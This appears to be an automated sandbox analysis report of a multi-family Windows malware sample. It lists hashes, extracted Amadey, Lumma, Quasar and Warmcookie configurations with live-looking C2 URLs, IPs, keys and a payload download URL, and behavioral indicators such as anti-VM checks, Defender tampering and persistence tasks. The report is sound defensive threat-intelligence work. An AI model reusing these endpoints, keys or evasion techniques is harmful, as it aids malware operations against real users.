Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 17:55
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-01_56e63ce4c31d134e740e27050eaf59b7_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
56e63ce4c31d134e740e27050eaf59b7
-
SHA1
ba2531ce8f5995788d1aee232455dd91bb9e57a0
-
SHA256
9e0e8cca2556ab0d517e41ab0fb799e94b25deecac731753daeccd091e402948
-
SHA512
fc6d9ee8f1b69acb810494de3a49dd43328bb494b12e787021b413680e928d246d5b143c8eb76622e200ce09d3dbf28f18a1705b2a005e207a2f08c68af729e8
-
SSDEEP
24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8a0Au:DTvC/MTQYxsWR7a0A
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://navstarx.shop/FoaJSi
https://dmetalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://-targett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://targett.top/dsANGt
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
amadey
5.33
faec90
-
install_dir
52907c9546
-
install_file
tgvazx.exe
-
strings_key
cc9d94f7503394295f4824f8cfd50608
-
url_paths
/Di0Her478/index.php
Extracted
quasar
1.4.1
CyberPunk
dakar.wohowoho.com:443
dakar.wohowoho.com:80
206.206.76.75:443
206.206.76.75:80
62.60.226.176:80
62.60.226.176:443
5e809a5b-bb22-41b6-af20-5285e99040d3
-
encryption_key
A98DEEE2D49BDF1C5183B3079E9B28E281586F6F
-
install_name
chrome.exe
-
log_directory
Logs
-
reconnect_delay
30000
-
startup_key
GoogleChrome
-
subdirectory
Google\Chrome
Extracted
warmcookie
192.36.57.50
-
mutex
62580f79-f0e4-46c9-9fe6-041328dce2b7
-
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Signatures
-
Amadey family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000240dd-199.dat family_quasar behavioral1/memory/1212-212-0x0000000000110000-0x0000000000432000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3508 created 3004 3508 Abspawnhlp.exe 51 PID 5068 created 3004 5068 CamMenuMaker.exe 51 -
Warmcookie family
-
Warmcookie, Badspace
Warmcookie aka Badspace is a backdoor written in C++.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 60578b2a60.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 22 228 powershell.exe 114 4308 powershell.exe 145 5304 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 228 powershell.exe 5764 powershell.exe 5996 powershell.exe 5584 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 16 IoCs
flow pid Process 120 752 rapes.exe 120 752 rapes.exe 120 752 rapes.exe 146 752 rapes.exe 22 228 powershell.exe 35 752 rapes.exe 93 752 rapes.exe 114 4308 powershell.exe 55 752 rapes.exe 96 2060 Abspawnhlp.exe 96 2060 Abspawnhlp.exe 96 2060 Abspawnhlp.exe 96 2060 Abspawnhlp.exe 45 752 rapes.exe 145 5304 powershell.exe 161 752 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5924 takeown.exe 2084 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 60578b2a60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 60578b2a60.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation LXUZVRLG.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation KRWXARXD.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation PQPYAYJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation Abspawnhlp.exe Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation 261.exe -
Executes dropped EXE 45 IoCs
pid Process 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 752 rapes.exe 3672 XOPPRUc.exe 3652 PQPYAYJJ.exe 3684 Abspawnhlp.exe 3892 Abspawnhlp.exe 2224 rapes.exe 1444 h8NlU62.exe 1212 NHq7LaU.exe 2776 chrome.exe 4656 Abspawnhlp.exe 2480 Abspawnhlp.exe 4528 LXUZVRLG.exe 3436 Abspawnhlp.exe 396 890172171_x64.exe 1244 CamMenuMaker.exe 4912 CamMenuMaker.exe 1648 Abspawnhlp.exe 4236 Updater.exe 4408 rapes.exe 916 CamMenuMaker.exe 3852 CamMenuMaker.exe 552 IEYKSCXV.exe 1580 KRWXARXD.exe 4292 CamMenuMaker.exe 216 dat2C09.exe 6168 qWR3lUj.exe 6772 Abspawnhlp.exe 2868 Abspawnhlp.exe 1444 HAe88WC.exe 5304 apple.exe 6792 261.exe 6756 261.exe 5776 760bf5946f.exe 6008 04214d2864.exe 3012 dat90FE.exe 2332 Abspawnhlp.exe 6928 Abspawnhlp.exe 3036 HelpLink.exe 2480 60578b2a60.exe 5840 NHq7LaU.exe 5972 Rm3cVPI.exe 6184 7IIl2eE.exe 4812 rapes.exe 7020 p3hx1_003.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine 60578b2a60.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE Key opened \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Software\Wine rapes.exe -
Loads dropped DLL 64 IoCs
pid Process 3684 Abspawnhlp.exe 3684 Abspawnhlp.exe 3684 Abspawnhlp.exe 3684 Abspawnhlp.exe 3684 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 3892 Abspawnhlp.exe 2060 Abspawnhlp.exe 4656 Abspawnhlp.exe 4656 Abspawnhlp.exe 4656 Abspawnhlp.exe 4656 Abspawnhlp.exe 4656 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 2480 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 3436 Abspawnhlp.exe 1244 CamMenuMaker.exe 1244 CamMenuMaker.exe 1244 CamMenuMaker.exe 1244 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 4912 CamMenuMaker.exe 1204 Abspawnhlp.exe 916 CamMenuMaker.exe 916 CamMenuMaker.exe 916 CamMenuMaker.exe 916 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3852 CamMenuMaker.exe 3508 Abspawnhlp.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 4292 CamMenuMaker.exe 5068 CamMenuMaker.exe 6772 Abspawnhlp.exe 6772 Abspawnhlp.exe 6772 Abspawnhlp.exe 6772 Abspawnhlp.exe 6772 Abspawnhlp.exe 2868 Abspawnhlp.exe 2868 Abspawnhlp.exe 2868 Abspawnhlp.exe 2868 Abspawnhlp.exe 2868 Abspawnhlp.exe 6844 CamMenuMaker.exe 6280 Abspawnhlp.exe 2332 Abspawnhlp.exe 2332 Abspawnhlp.exe 2332 Abspawnhlp.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2084 icacls.exe 5924 takeown.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in System32 directory 58 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\buttercup.swf Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libcrypto-1_1.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Comn.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libcrypto-1_1.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat90FE.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\JHANBX93.htm Updater.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Package dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\libssl-1_1.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat90FE.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\03JL26SU.htm Updater.exe File created C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat90FE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\libssl-1_1.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcr80.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\buttercup.swf dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\declarator.txt Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Comn.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\msvcp80.dll Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcp80.dll Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\declarator.txt Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\Abspawnhlp.exe Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Comn.dll dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\msvcr80.dll Abspawnhlp.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\V0OZY0CB.htm Updater.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\SearchWiwer7_8 dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\Abspawnhlp.exe dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\svcPower_test\buttercup.swf Abspawnhlp.exe File created C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libssl-1_1.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\msvcr80.dll dat90FE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\declarator.txt dat2C09.exe File created C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\msvcp80.dll dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\RMS_RDP_1 dat2C09.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\Package dat90FE.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\comNotepad_beta\Abspawnhlp.exe Abspawnhlp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\libcrypto-1_1.dll dat90FE.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 3728 Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE 752 rapes.exe 2224 rapes.exe 4408 rapes.exe 2480 60578b2a60.exe 4812 rapes.exe -
Suspicious use of SetThreadContext 18 IoCs
description pid Process procid_target PID 3672 set thread context of 4792 3672 XOPPRUc.exe 109 PID 1444 set thread context of 1528 1444 h8NlU62.exe 116 PID 3892 set thread context of 2060 3892 Abspawnhlp.exe 118 PID 3892 set thread context of 2752 3892 Abspawnhlp.exe 122 PID 2480 set thread context of 1204 2480 Abspawnhlp.exe 141 PID 3436 set thread context of 3508 3436 Abspawnhlp.exe 142 PID 2060 set thread context of 1648 2060 Abspawnhlp.exe 147 PID 6168 set thread context of 1084 6168 qWR3lUj.exe 173 PID 2480 set thread context of 3124 2480 Abspawnhlp.exe 158 PID 1444 set thread context of 6188 1444 HAe88WC.exe 180 PID 3436 set thread context of 3484 3436 Abspawnhlp.exe 160 PID 5776 set thread context of 2336 5776 760bf5946f.exe 254 PID 4912 set thread context of 3652 4912 CamMenuMaker.exe 165 PID 2868 set thread context of 6280 2868 Abspawnhlp.exe 197 PID 3852 set thread context of 6840 3852 CamMenuMaker.exe 177 PID 4292 set thread context of 316 4292 CamMenuMaker.exe 255 PID 6928 set thread context of 4844 6928 Abspawnhlp.exe 272 PID 2868 set thread context of 5724 2868 Abspawnhlp.exe 266 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe -
Drops file in Windows directory 37 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp712FU7AD1PLM86VXIQCIS934OTZ8FLRJ.EXE File created C:\Windows\Tasks\Avex Designs.job 890172171_x64.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e589474.msi msiexec.exe File created C:\Windows\Installer\e589479.msi msiexec.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Installer\SourceHash{2EF5B19F-6B07-454C-9A55-639BDA404CDF} msiexec.exe File created C:\Windows\Installer\e58946f.msi msiexec.exe File created C:\Windows\Tasks\httpTool_alpha.job cmd.exe File opened for modification C:\Windows\Installer\e589470.msi msiexec.exe File created C:\Windows\Tasks\ctrlTask.job cmd.exe File created C:\Windows\Tasks\Protecttls.job cmd.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{37BD7FCD-CFF5-41A4-855A-AA18B2383F73} msiexec.exe File created C:\Windows\Installer\e589470.msi msiexec.exe File created C:\Windows\Installer\e589475.msi msiexec.exe File created C:\Windows\Installer\e58946b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI9584.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{A96A5C12-2BA0-4882-B94A-BED0ECDD226E} msiexec.exe File opened for modification C:\Windows\Installer\MSID482.tmp msiexec.exe File opened for modification C:\Windows\Installer\e589475.msi msiexec.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIEF7E.tmp msiexec.exe File created C:\Windows\Tasks\controladvanced_MKO_test.job cmd.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\Installer\e58946b.msi msiexec.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
